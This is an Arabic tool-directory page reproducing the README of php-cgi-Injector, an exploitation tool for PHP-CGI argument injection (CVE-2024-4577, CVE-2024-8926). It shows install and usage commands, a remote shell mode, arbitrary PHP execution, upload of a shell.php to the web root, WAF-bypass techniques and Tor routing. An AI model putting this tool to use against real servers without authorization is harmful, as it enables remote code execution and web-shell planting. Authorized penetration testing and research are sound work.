Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
php-cgi-Injector — أداة اختبار اختراق أمني لـ CVE-2024-4577 و CVE-2024-8926 | Kitploit
أدوات/GitHubGitHub/night-have-dreams/php-cgi-injector
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراقالقيادة والسيطرة
GitHubnight-have-dreams/php-cgi-injector

php-cgi-Injector

أداة اختبار اختراق أمني لـ CVE-2024-4577 و CVE-2024-8926

عرض المستودع
4924منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PHP-CGI Injector

🚀 أداة استغلال الثغرات CVE-2024-4577 & CVE-2024-8926

أداة اختبار آلية لثغرة حقن المعاملات في PHP-CGI، تدعم CVE-2024-4577 و CVE-2024-8926، وتتيح عمليات تنفيذ الأوامر، رفع الملفات، تنزيلها وغيرها.


📌 مقدمة

يمكن استخدام هذه الأداة لاختبار ثغرات حقن المعاملات في بيئة PHP-CGI، وتوفر:

  • ✅ واجهة طرفية رائعة مع تأثيرات متحركة
  • ✅ فحص الثغرات بشكل تلقائي
  • ✅ أوضاع هجوم متعددة (Shell، تنفيذ كود PHP، رفع/تنزيل ملفات)
  • ✅ مجموعات حمولات (Payloads) افتراضية ومخصصة
  • ✅ وضع إخفاء حركة المرور عبر Tor
  • ✅ وحدات تجاوز WAF متعددة
  • ✅ تحويل تلقائي لتشفير المخرجات
  • ✅ وضع استغلال إجباري (حتى لو لم يتم اكتشاف الثغرة)
  • ❌ لا يدعم تحضير القهوة، لكنه يدعم تحميص جدران الحماية (WAF).
  • ❌ لا يدعم كتابة التقارير، أو مغازلة الفتيات، أو النجاح في الدراسات العليا.
  • ❌ لا يدعم الهندسة الاجتماعية، عليك مواجهة البشر بنفسك.

📜 إخلاء المسؤولية

هذه الأداة مخصصة للاختبارات المشروعة والأغراض الأكاديمية فقط، يُحظر استخدامها على أنظمة غير مصرح بها!

⚠️ الاستخدام غير القانوني يعرضك للمسؤولية القانونية!

هذه الأداة مخصصة فقط لـ:

  • 🔹 اختبارات الاختراق للفرق الحمراء في المؤسسات
  • 🔹 أبحاث أمنية في مسابقات CTF
  • 🔹 التعلم الأمني الشخصي
  • 🔹 اختبارات أمنية مرخصة قانونياً

  • 📥 تثبيت المتطلبات

    تعتمد هذه الأداة على حزم Python التالية، يرجى تثبيتها أولاً:

    root@kitploit:~
    pip install -r requirements.txt
    

    أو التثبيت اليدوي:

    root@kitploit:~
    pip install requests requests-tor chardet urllib3 rich
    

    🛠️ طريقة الاستخدام

    📌 الاستخدام الأساسي

    root@kitploit:~
    python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]
    

    أمثلة:

    root@kitploit:~
    python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
    python exploit.py -u http://example.com --bypass --force
    python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php
    

    📌 خيارات المعاملات

    المعاملالوصفمثال
    -u أو --urlتحديد عنوان الهدف-u http://example.com
    --timeout secتعيين مهلة الطلب (0 للا نهائي)--timeout 30
    --logتسجيل أوامر shell تلقائياً--log
    --payloadتحديد أو تخصيص مجموعة الحمولات--payload 2
    --torإرسال الطلبات عبر Tor--tor
    --verboseعرض معلومات مفصلة--verbose
    --bypassتفعيل وضع تجاوز WAF--bypass
    --forceالدخول القسري لوضع الاستغلال--force
    --cgipoint PATHSتحديد مسارات CGI محددة للاختبار--cgipoint /path
    --delay secتأخير بالثواني بين الطلبات--delay 1.5
    --no-effectsإيقاف جميع التأثيرات المتحركة والتأخير--no-effects

    📌 وضع التشغيل

    عندما يجد السكريبت ثغرة، يعرض قائمة:

    root@kitploit:~
    ╭────────────  قائمة وضع الاستغلال  ────────────╮
    │ الهدف الحالي: http://example.com/              │
    │ نقطة الحقن الحالية: /php-cgi/php-cgi.exe       │
    │ رقم الثغرة: CVE-2024-4577                       │
    ╰─────────────────────────────────────────────────╯
    1) 🧪 وضع Shell
    2) 🛠️ وضع PHP مخصص
    3) 📤 رفع ملف
    4) 📥 تنزيل ملف
    5) 🎯 تبديل الهدف
    6) ⚙️ إعدادات المعاملات
    7) ❌ خروج
    >>
    

    📌 شرح الأوضاع

    1️⃣ وضع Shell

    تنفيذ أوامر النظام:

    root@kitploit:~
    shell> whoami
    

    📂 حفظ المخرجات

    root@kitploit:~
    shell> whoami --save
    
    root@kitploit:~
    shell> whoami --save C:\output\whoami.txt
    

    2️⃣ وضع PHP المخصص

    تنفيذ كود PHP مخصص:

    root@kitploit:~
    phpinfo();
    EOF
    

    📂 حفظ المخرجات

    root@kitploit:~
    phpinfo();
    EOF --save
    
    root@kitploit:~
    phpinfo();
    EOF --save C:\output\info.html
    

    3️⃣ رفع ملف

    root@kitploit:~
    مسار الملف المحلي: C:\test\shell.php
    المسار الكامل للهدف:
    [*] تم تعيين مسار الرفع تلقائياً إلى: C:/xampp/htdocs/shell.php
    

    📂 تحديد المسار يدوياً

    root@kitploit:~
    المسار الكامل للهدف: C:\xampp\php\shell.php
    

    4️⃣ تنزيل ملف

    root@kitploit:~
    مسار الملف البعيد: C:\xampp\htdocs\index.php
    

    📂 يُحفظ الملف في download/، وإذا كان موجوداً، يُضاف رقم تلقائي

    root@kitploit:~
    [*] تم تنزيل الملف، محفوظ في download/index.php
    

    5️⃣ تبديل الهدف

    root@kitploit:~
    أدخل عنوان الهدف الجديد: http://newtarget.com
    

    🔹 سيتم إعادة اختبار الثغرة


    6️⃣ تبديل المعاملات

    root@kitploit:~
    [⚙️ قائمة إعدادات مرحلة الاستغلال]
    
    1) تبديل الحمولة (Payload)        1
    2) وحدة التجاوز (Bypass)          غير محدد
    3) مهلة الانتظار (Timeout)        10 ثوانٍ
    4) تأخير الطلب (Delay)            0 ثوانٍ
    5) التسجيل التلقائي (Log)        مغلق
    6) الوضع المفصل (Verbose)        مغلق
    7) التأثيرات المتحركة (Effects)   مفعل
    8) الاستغلال الإجباري (Force)    مغلق
    9) حفظ والعودة إلى قائمة الاستغلال
    

    📌 وحدات تجاوز WAF

    توفر الاستراتيجيات التالية للتجاوز:

    • تشويه مسار CGI
    • إضافة أحرف غير صالحة قبل وبعد الحمولة
    • استبدال php://input بصيغ أخرى
    • إضافة رؤوس HTTP محددة أو عشوائية
    • تشويش محتوى POST
    • خلط ترتيب الحمولة عشوائياً
    • سكريبت تجاوز مخصص، راجع التنسيق في tamper_example_template.txt
    تنزيل الأداة